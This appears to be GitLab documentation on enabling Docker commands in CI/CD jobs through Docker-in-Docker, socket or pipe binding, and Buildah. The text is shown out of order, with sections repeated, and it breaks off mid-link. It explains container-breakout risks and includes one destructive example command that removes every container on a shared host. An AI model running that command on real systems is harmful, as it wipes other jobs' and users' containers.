Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-2) #### Use the Docker executor with Docker pipe binding You can use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) to run jobs in a Windows-based container. To mount the Docker pipe with the Docker executor, add `"\\.\pipe\docker_engine:\\.\pipe\docker_engine"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 1. To mount `"\\.\pipe\docker_engine` while registering your runner, include the following options: ```powershell .\gitlab-runner.exe register \ --non-interactive \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor "docker-windows" \ --description "docker-windows-runner" --tag-list "docker-windows-runner" \ --docker-image "docker:25-windowsservercore-ltsc2022" \ --docker-volumes "\\.\pipe\docker_engine:\\.\pipe\docker_engine" ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = RUNNER_TOKEN executor = "docker-windows" [runners.docker] tls_verify = false image = "docker:25-windowsservercore-ltsc2022" privileged = false disable_cache = false volumes = ["\\.\pipe\docker_engine:\\.\pipe\docker_engine"] [runners.cache] Insecure = false ``` 1. Use Docker in the job script: ```yaml default: image: docker:25-windowsservercore-ltsc2022 before_script: - docker version - docker info build: stage: build tags: - docker-windows-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Use the Kubernetes executor with Docker pipe binding You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes.html) to run jobs in a Windows-based container. To use Kubernetes executor for Windows-based containers, you must include Windows nodes in your Kubernetes cluster. For more information, see [Windows containers in Kubernetes](https://kubernetes.io/docs/concepts/windows/intro/). You can use [Runner operating in a Linux environment but targeting Windows nodes](https://docs.gitlab.com/runner/executors/kubernetes/#example-for-windowsamd64) To mount the Docker pipe with the Kubernetes executor, add `"\\.\pipe\docker_engine"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume). 1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html). ```yaml runners: tags: "kubernetes-windows-runner" config: | [[runners]] executor = "kubernetes" # The FF_USE_POWERSHELL_PATH_RESOLVER feature flag has to be enabled for PowerShell # to resolve paths for Windows correctly when Runner is operating in a Linux environment # but targeting Windows nodes. [runners.feature_flags] FF_USE_POWERSHELL_PATH_RESOLVER = true [runners.kubernetes] [[runners.kubernetes.volumes.host_path]] host_path = '\\.\pipe\docker_engine' mount_path = '\\.\pipe\docker_engine' name = 'docker-pipe' read_only = true [runners.kubernetes.node_selector] "kubernetes.io/arch" = "amd64" "kubernetes.io/os" = "windows" "node.kubernetes.io/windows-build" = "10.0.20348" ``` 1. Use Docker in the job script: ```yaml default: image: docker:25-windowsservercore-ltsc2022 before_script: - docker version - docker info build: stage: build tags: - kubernetes-windows-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Known issues with AWS EKS Kubernetes cluster When you migrate from `dockerd` to `containerd`, the AWS EKS bootstrapping script `Start-EKSBootstrap.ps1` stops and disables the Docker Service. To work around this issue, rename the Docker Service after you [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1) with this script: ```powershell Write-Output "Rename the just installed Docker Engine Service from docker to dockerd" Write-Output "because the Start-EKSBootstrap.ps1 stops and disables the docker Service as part of migration from dockerd to containerd" Stop-Service -Name docker dockerd --register-service --service-name dockerd Start-Service -Name dockerd Write-Output "Ready to do Docker pipe binding on Windows EKS Node! :-)" ``` #### Known issues with Docker pipe binding Docker pipe binding has the same set of security and isolation issues as the [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). ## Enable registry mirror for `docker:dind` service When the Docker daemon starts inside the service container, it uses the default configuration. You might want to configure a [registry mirror](https://docs.docker.com/docker-hub/mirror/) for performance improvements and to ensure you do not exceed Docker Hub rate limits. ### The service in the `.gitlab-ci.yml` file You can append extra CLI flags to the `dind` service to set the registry mirror: ```yaml services: - name: docker:24.0.5-dind command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use ``` ### The service in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can specify the `command` to configure the registry mirror for the Docker daemon. The `dind` service must be defined for the [Docker](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runnersdockerservices-section) or [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). Docker: ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true [[runners.docker.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` Kubernetes: ```toml [[runners]] ... name = "kubernetes" [runners.kubernetes] ... privileged = true [[runners.kubernetes.services]] name = "docker:24.0.5-dind" command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` ### The Docker executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). For example, if you have a `/opt/docker/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This mounts the file for **every** container created by GitLab Runner. The configuration is detected by the `dind` service. ```toml [[runners]] ... executor = "docker" [runners.docker] image = "alpine:3.12" privileged = true volumes = ["/opt/docker/daemon.json:/etc/docker/daemon.json:ro"] ``` ### The Kubernetes executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the [configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html) to specify a [ConfigMap volume mount](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). For example, if you have a `/tmp/daemon.json` file with the following content: ```json { "registry-mirrors": [ "https://registry-mirror.example.com" ] } ``` Create a [ConfigMap](https://kubernetes.io/docs/concepts/configuration/configmap/) with the content of this file. You can do this with a command like: ```shell kubectl create configmap docker-daemon --namespace gitlab-runner --from-file /tmp/daemon.json ``` {{< alert type="note" >}} You must use the namespace that the Kubernetes executor for GitLab Runner uses to create job pods. {{< /alert >}} After the ConfigMap is created, you can update the `config.toml` file to mount the file to `/etc/docker/daemon.json`. This update mounts the file for **every** container created by GitLab Runner. The `dind` service detects this configuration. ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "docker-daemon" mount_path = "/etc/docker/daemon.json" sub_path = "daemon.json" ``` ## Authenticate with registry in Docker-in-Docker When you use Docker-in-Docker, the [standard authentication methods](using_docker_images.md#access-an-image-from-a-private-container-registry) do not work, because a fresh Docker daemon is started with the service. You should [authenticate with registry](authenticate_registry.md). ## Make Docker-in-Docker builds faster with Docker layer caching When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. You can [make your builds faster with Docker layer caching](docker_layer_caching.md). ## Use the OverlayFS driver {{< alert type="note" >}} The instance runners on GitLab.com use the `overlay2` driver by default. {{< /alert >}} By default, when using `docker:dind`, Docker uses the `vfs` storage driver, which copies the file system on every run. You can avoid this disk-intensive operation by using a different driver, for example `overlay2`. ### Requirements 1. Ensure a recent kernel is used, preferably `>= 4.2`. 1. Check whether the `overlay` module is loaded: ```shell sudo lsmod | grep overlay ``` If you see no result, then the module is not loaded. To load the module, use: ```shell sudo modprobe overlay ``` If the module loaded, you must make sure the module loads on reboot. On Ubuntu systems, do this by adding the following line to `/etc/modules`: ```plaintext overlay ``` ### Use the OverlayFS driver per project You can enable the driver for each project individually by using the `DOCKER_DRIVER` [CI/CD variable](../yaml/_index.md#variables) in `.gitlab-ci.yml`: ```yaml variables: DOCKER_DRIVER: overlay2 ``` ### Use the OverlayFS driver for every project If you use your own [runners](https://docs.gitlab.com/runner/), you can enable the driver for every project by setting the `DOCKER_DRIVER` environment variable in the [`[[runners]]` section of the `config.toml` file](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section): ```toml environment = ["DOCKER_DRIVER=overlay2"] ``` If you're running multiple runners, you must modify all configuration files. Read more about the [runner configuration](https://docs.gitlab.com/runner/configuration/) and [using the OverlayFS storage driver](https://docs.docker.com/storage/storagedriver/overlayfs-driver/). ## Docker alternatives You can build container images without enabling privileged mode on your runner: - [BuildKit](using_buildkit.md): Includes rootless BuildKit options that eliminate Docker daemon dependency. - [Buildah](#buildah-example): Build OCI-compliant images without requiring a Docker daemon. ### Buildah example To use Buildah with GitLab CI/CD, you need [a runner](https://docs.gitlab.com/runner/) with one of the following executors: - [Kubernetes](https://docs.gitlab.com/runner/executors/kubernetes/). - [Docker](https://docs.gitlab.com/runner/executors/docker.html). - [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html). In this example, you use Buildah to: 1. Build a Docker image. 1. Push it to [GitLab container registry](../../user/packages/container_registry/_index.md). In the last step, Buildah uses the `Dockerfile` under the root directory of the project to build the Docker image. Finally, it pushes the image to the project's container registry: ```yaml build: stage: build image: quay.io/buildah/stable variables: # Use vfs with buildah. Docker offers overlayfs as a default, but Buildah # cannot stack overlayfs on top of another overlayfs filesystem. STORAGE_DRIVER: vfs # Write all image metadata in the docker format, not the standard OCI format. # Newer versions of docker can handle the OCI format, but older versions, like # the one shipped with Fedora 30, cannot handle the format. BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" before_script: # GitLab container registry credentials taken from the # [predefined CI/CD variables](../variables/_index.md#predefined-cicd-variables) # to authenticate to the registry. - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` If you are using GitLab Runner Operator deployed to an OpenShift cluster, try the [tutorial for using Buildah to build images in rootless container](buildah_rootless_tutorial.md). ## Use the GitLab container registry After you've built a Docker image, you can push it to the [GitLab container registry](../../user/packages/container_registry/build_and_push_images.md#use-gitlab-cicd). ## Troubleshooting ### `open //./pipe/docker_engine: The system cannot find the file specified` The following error might appear when you run a `docker` command in the PowerShell script to access the mounted Docker pipe: ```powershell PS C:\> docker version Client: Version: 25.0.5 API version: 1.44 Go version: go1.21.8 Git commit: 5dc9bcc Built: Tue Mar 19 15:06:12 2024 OS/Arch: windows/amd64 Context: default error during connect: this error may indicate that the docker daemon is not running: Get "http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.44/version": open //./pipe/docker_engine: The system cannot find the file specified. ``` The error indicates that the Docker Engine is not running on the Windows EKS Node and the Docker pipe binding could not be used in the Windows-based Executor container. To solve the problem, use the workaround described in [Use the Kubernetes executor with Docker pipe binding](#use-the-kubernetes-executor-with-docker-pipe-binding).
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use Docker to build Docker images breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can use GitLab CI/CD with Docker to create Docker images. For example, you can create a Docker image of your application, test it, and push it to a container registry. To run Docker commands in your CI/CD jobs, you must configure GitLab Runner to support `docker` commands. This method requires `privileged` mode. If you want to build Docker images without enabling `privileged` mode on the runner, you can use a [Docker alternative](#docker-alternatives). ## Enable Docker commands in your CI/CD jobs To enable Docker commands for your CI/CD jobs, you can use: - [The shell executor](#use-the-shell-executor) - [Docker-in-Docker](#use-docker-in-docker) - [Docker socket binding](#use-docker-socket-binding) - [Docker pipe binding](#use-docker-pipe-binding) ### Use the shell executor To include Docker commands in your CI/CD jobs, you can configure your runner to use the `shell` executor. In this configuration, the `gitlab-runner` user runs the Docker commands, but needs permission to do so. 1. [Install](https://gitlab.com/gitlab-org/gitlab-runner/#installation) GitLab Runner. 1. [Register](https://docs.gitlab.com/runner/register/) a runner. Select the `shell` executor. For example: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor shell \ --description "My Runner" ``` 1. On the server where GitLab Runner is installed, install Docker Engine. View a list of [supported platforms](https://docs.docker.com/engine/install/). 1. Add the `gitlab-runner` user to the `docker` group: ```shell sudo usermod -aG docker gitlab-runner ``` 1. Verify that `gitlab-runner` has access to Docker: ```shell sudo -u gitlab-runner -H docker info ``` 1. In GitLab, add `docker info` to `.gitlab-ci.yml` to verify that Docker is working: ```yaml default: before_script: - docker info build_image: script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` You can now use `docker` commands (and install Docker Compose if needed). When you add `gitlab-runner` to the `docker` group, you effectively grant `gitlab-runner` full root permissions. For more information, see [security of the `docker` group](https://blog.zopyx.com/on-docker-security-docker-group-considered-harmful/). ### Use Docker-in-Docker "Docker-in-Docker" (`dind`) means: - Your registered runner uses the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) or the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/). - The executor uses a [container image of Docker](https://hub.docker.com/_/docker/), provided by Docker, to run your CI/CD jobs. The Docker image includes all of the `docker` tools and can run the job script in context of the image in privileged mode. You should use Docker-in-Docker with TLS enabled, which is supported by [GitLab.com instance runners](../runners/_index.md). You should always pin a specific version of the image, like `docker:24.0.5`. If you use a tag like `docker:latest`, you have no control over which version is used. This can cause incompatibility problems when new versions are released. #### Use the Docker executor with Docker-in-Docker You can use the Docker executor to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in the Docker executor The Docker daemon supports connections over TLS. TLS is the default in Docker 19.03.12 and later. {{< alert type="warning" >}} This task enables `--docker-privileged`, which effectively disables the container's security mechanisms and exposes your host to privilege escalation. This action can cause container breakout. For more information, see [runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities). {{< /alert >}} To use Docker-in-Docker with TLS enabled: 1. Install [GitLab Runner](https://docs.gitlab.com/runner/install/). 1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged \ --docker-volumes "/certs/client" ``` - This command registers a new runner to use the `docker:24.0.5` image (if none is specified at the job level). To start the build and service containers, it uses the `privileged` mode. If you want to use Docker-in-Docker, you must always use `privileged = true` in your Docker containers. - This command mounts `/certs/client` for the service and build container, which is needed for the Docker client to use the certificates in that directory. For more information, see [the Docker image documentation](https://hub.docker.com/_/docker/). The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/certs/client", "/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When you use the dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. Docker 19.03 does this automatically # by setting the DOCKER_HOST in # https://github.com/docker-library/docker/blob/d45051476babc297257df490d22cbd806f1b11e4/19.03/docker-entrypoint.sh#L23-L29 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" build: stage: build tags: - tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Use a Unix socket on a shared volume between Docker-in-Docker and build container Directories defined in `volumes = ["/certs/client", "/cache"]` in the [Docker-in-Docker with TLS enabled in the Docker executor](#docker-in-docker-with-tls-enabled-in-the-docker-executor) approach are [persistent between builds](https://docs.gitlab.com/runner/executors/docker.html#persistent-storage). If multiple CI/CD jobs using a Docker executor runner have Docker-in-Docker services enabled, then each job writes to the directory path. This approach might result in a conflict. To address this conflict, use a Unix socket on a volume shared between the Docker-in-Docker service and the build container. This approach improves performance and establishes a secure connection between the service and client. The following is a sample `config.toml` with temporary volume shared between build and service containers: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] image = "docker:24.0.5" privileged = true volumes = ["/runner/services/docker"] # Temporary volume shared between build and service containers. ``` The Docker-in-Docker service creates a `docker.sock`. The Docker client connects to `docker.sock` through a Docker Unix socket volume. ```yaml job: variables: # This variable is shared by both the DinD service and Docker client. # For the service, it will instruct DinD to create `docker.sock` here. # For the client, it tells the Docker client which Docker Unix socket to connect to. DOCKER_HOST: "unix:///runner/services/docker/docker.sock" services: - docker:24.0.5-dind image: docker:24.0.5 script: - docker version ``` ##### Docker-in-Docker with TLS disabled in the Docker executor Sometimes there are legitimate reasons to disable TLS. For example, you have no control over the GitLab Runner configuration that you are using. 1. Register GitLab Runner from command line. Use `docker` and `privileged` mode: ```shell sudo gitlab-runner register -n \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor docker \ --description "My Docker Runner" \ --tag-list "no-tls-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-privileged ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = true disable_cache = false volumes = ["/cache"] [runners.cache] [runners.cache.s3] [runners.cache.gcs] ``` 1. Include the `docker:24.0.5-dind` service in the job script: ```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind before_script: - docker info variables: # When using dind service, you must instruct docker to talk with the # daemon started inside of the service. The daemon is available with # a network connection instead of the default /var/run/docker.sock socket. # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#accessing-the-services # DOCKER_HOST: tcp://docker:2375 # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with proxy enabled in the Docker executor You might need to configure proxy settings to use the `docker push` command. For more information, see [Proxy settings when using dind service](https://docs.gitlab.com/runner/configuration/proxy.html#proxy-settings-when-using-dind-service). #### Use the Kubernetes executor with Docker-in-Docker You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/) to run jobs in a Docker container. ##### Docker-in-Docker with TLS enabled in Kubernetes To use Docker-in-Docker with TLS enabled in Kubernetes: 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) to specify a volume mount. ```yaml runners: tags: "tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true [[runners.kubernetes.volumes.empty_dir]] name = "docker-certs" mount_path = "/certs/client" medium = "Memory" ``` 1. Include the `docker:24.0.5-dind` service in the job: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2376" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2376 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # Specify to Docker where to create the certificates. Docker # creates them automatically on boot, and creates # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" # These are usually specified by the entrypoint, however the # Kubernetes executor doesn't run entrypoints # https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4125 DOCKER_TLS_VERIFY: 1 DOCKER_CERT_PATH: "$DOCKER_TLS_CERTDIR/client" build: stage: build tags: - tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` ##### Docker-in-Docker with TLS disabled in Kubernetes To use Docker-in-Docker with TLS disabled in Kubernetes, you must adapt the previous example to: - Remove the `[[runners.kubernetes.volumes.empty_dir]]` section from the `values.yml` file. - Change the port from `2376` to `2375` with `DOCKER_HOST: tcp://docker:2375`. - Instruct Docker to start with TLS disabled with `DOCKER_TLS_CERTDIR: ""`. For example: 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137): ```yaml runners: tags: "no-tls-dind-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = true ``` 1. You can now use `docker` in the job script. You should include the `docker:24.0.5-dind` service: ```yaml default: image: docker:24.0.5 services: - name: docker:24.0.5-dind variables: HEALTHCHECK_TCP_PORT: "2375" before_script: - docker info variables: # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. DOCKER_HOST: tcp://docker:2375 # # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/services/#accessing-the-services. # # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" build: stage: build tags: - no-tls-dind-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker-in-Docker Docker-in-Docker is the recommended configuration, but you should be aware of the following issues: - **The `docker-compose` command**: This command is not available in this configuration by default. To use `docker-compose` in your job scripts, follow the Docker Compose [installation instructions](https://docs.docker.com/compose/install/). - **Cache**: Each job runs in a new environment. Because every build gets its own instance of the Docker engine, concurrent jobs do not cause conflicts. However, jobs can be slower because there's no caching of layers. See [Docker layer caching](#make-docker-in-docker-builds-faster-with-docker-layer-caching). - **Storage drivers**: By default, earlier versions of Docker use the `vfs` storage driver, which copies the file system for each job. Docker 17.09 and later use `--storage-driver overlay2`, which is the recommended storage driver. See [Using the OverlayFS driver](#use-the-overlayfs-driver) for details. - **Root file system**: Because the `docker:24.0.5-dind` container and the runner container do not share their root file system, you can use the job's working directory as a mount point for child containers. For example, if you have files you want to share with a child container, you could create a subdirectory under `/builds/$CI_PROJECT_PATH` and use it as your mount point. For a more detailed explanation, see [issue #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227). ```yaml variables: MOUNT_POINT: /builds/$CI_PROJECT_PATH/mnt script: - mkdir -p "$MOUNT_POINT" - docker run -v "$MOUNT_POINT:/mnt" my-docker-image ``` ### Use Docker socket binding To use Docker commands in your CI/CD jobs, you can bind-mount `/var/run/docker.sock` into the build container. Docker is then available in the context of the image. If you bind the Docker socket you can't use `docker:24.0.5-dind` as a service. Volume bindings also affect services, making them incompatible. #### Use the Docker executor with Docker socket binding To mount the Docker socket with the Docker executor, add `"/var/run/docker.sock:/var/run/docker.sock"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 1. To mount `/var/run/docker.sock` while registering your runner, include the following options: ```shell sudo gitlab-runner register \ --non-interactive \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor "docker" \ --description "docker-runner" \ --tag-list "socket-binding-docker-runner" \ --docker-image "docker:24.0.5" \ --docker-volumes "/var/run/docker.sock:/var/run/docker.sock" ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = RUNNER_TOKEN executor = "docker" [runners.docker] tls_verify = false image = "docker:24.0.5" privileged = false disable_cache = false volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"] [runners.cache] Insecure = false ``` 1. Use Docker in the job script: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build tags: - socket-binding-docker-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Use the Kubernetes executor with Docker socket binding To mount the Docker socket with the Kubernetes executor, add `"/var/run/docker.sock"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume). 1. To specify a volume mount, update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) by using [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html). ```yaml runners: tags: "socket-binding-kubernetes-runner" config: | [[runners]] [runners.kubernetes] image = "ubuntu:20.04" privileged = false [runners.kubernetes] [[runners.kubernetes.volumes.host_path]] host_path = '/var/run/docker.sock' mount_path = '/var/run/docker.sock' name = 'docker-sock' read_only = true ``` 1. Use Docker in the job script: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build tags: - socket-binding-kubernetes-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Known issues with Docker socket binding When you use Docker socket binding, you avoid running Docker in privileged mode. However, the implications of this method are: - When you share the Docker daemon, you effectively disable the container's security mechanisms and expose your host to privilege escalation. This can cause container breakout. For example, if you run `docker rm -f $(docker ps -a -q)` in a project, it removes the GitLab Runner containers. - Concurrent jobs might not work. If your tests create containers with specific names, they might conflict with each other. - Any containers created by Docker commands are siblings of the runner, rather than children of the runner. This might cause complications for your workflow. - Sharing files and directories from the source repository into containers might not work as expected. Volume mounting is done in the context of the host machine, not the build container. For example: ```shell docker run --rm -t -i -v $(pwd)/src:/home/app/src test-image:latest run_app_tests ``` You do not need to include the `docker:24.0.5-dind` service, like you do when you use the Docker-in-Docker executor: ```yaml default: image: docker:24.0.5 before_script: - docker info build: stage: build script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` For complex Docker-in-Docker setups like [Code Quality scanning using CodeClimate](../testing/code_quality_codeclimate_scanning.md), you must match host and container paths for proper execution. For more details, see [Use private runners for CodeClimate-based scanning](../testing/code_quality_codeclimate_scanning.md#use-private-runners). ### Use Docker pipe binding Windows Containers run Windows executables compiled for the Windows Server kernel and userland (either windowsservercore or nanoserver). To build and run Windows containers, a Windows system with container support is required. For more information, see [Windows Containers](https://learn.microsoft.com/en-us/virtualization/windowscontainers/). To use Docker pipe binding, you must install and run a Docker Engine on the host Windows Server operating system. For more information, see [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-1). To use Docker commands in your Windows-based container CI/CD jobs, you can bind-mount `\\.\pipe\docker_engine` into the launched executor container. Docker is then available in the context of the image. The [Docker pipe binding in Windows](#use-docker-pipe-binding) is similar to [Docker socket binding in Linux](#use-docker-socket-binding) and have similar [Known issues](#known-issues-with-docker-pipe-binding) as [Known issues with Docker socket binding](#known-issues-with-docker-socket-binding). A mandatory prerequisite for usage of Docker pipe binding is a Docker Engine installed and running on the host Windows Server operating system. See: [Install Docker Community Edition (CE) on Windows Server](https://learn.microsoft.com/en-us/virtualization/windowscontainers/quick-start/set-up-environment?tabs=dockerce#windows-server-2) #### Use the Docker executor with Docker pipe binding You can use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html) to run jobs in a Windows-based container. To mount the Docker pipe with the Docker executor, add `"\\.\pipe\docker_engine:\\.\pipe\docker_engine"` to the [Volumes in the `[runners.docker]` section](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). 1. To mount `"\\.\pipe\docker_engine` while registering your runner, include the following options: ```powershell .\gitlab-runner.exe register \ --non-interactive \ --url "https://gitlab.com/" \ --registration-token REGISTRATION_TOKEN \ --executor "docker-windows" \ --description "docker-windows-runner" --tag-list "docker-windows-runner" \ --docker-image "docker:25-windowsservercore-ltsc2022" \ --docker-volumes "\\.\pipe\docker_engine:\\.\pipe\docker_engine" ``` The previous command creates a `config.toml` entry similar to the following example: ```toml [[runners]] url = "https://gitlab.com/" token = RUNNER_TOKEN executor = "docker-windows" [runners.docker] tls_verify = false image = "docker:25-windowsservercore-ltsc2022" privileged = false disable_cache = false volumes = ["\\.\pipe\docker_engine:\\.\pipe\docker_engine"] [runners.cache] Insecure = false ``` 1. Use Docker in the job script: ```yaml default: image: docker:25-windowsservercore-ltsc2022 before_script: - docker version - docker info build: stage: build tags: - docker-windows-runner script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ``` #### Use the Kubernetes executor with Docker pipe binding You can use the [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes.html) to run jobs in a Windows-based container. To use Kubernetes executor for Windows-based containers, you must include Windows nodes in your Kubernetes cluster. For more information, see [Windows containers in Kubernetes](https://kubernetes.io/docs/concepts/windows/intro/). You can use [Runner operating in a Linux environment but targeting Windows nodes](https://docs.gitlab.com/runner/executors/kubernetes/#example-for-windowsamd64) To mount the Docker pipe with the Kubernetes executor, add `"\\.\pipe\docker_engine"` to the [Volumes in the `[[runners.kubernetes.volumes.host_path]]` section](https://docs.gitlab.com/runner/executors/kubernetes/index.html#hostpath-volume). 1. To specify a volume mount, update the [`values.yml` 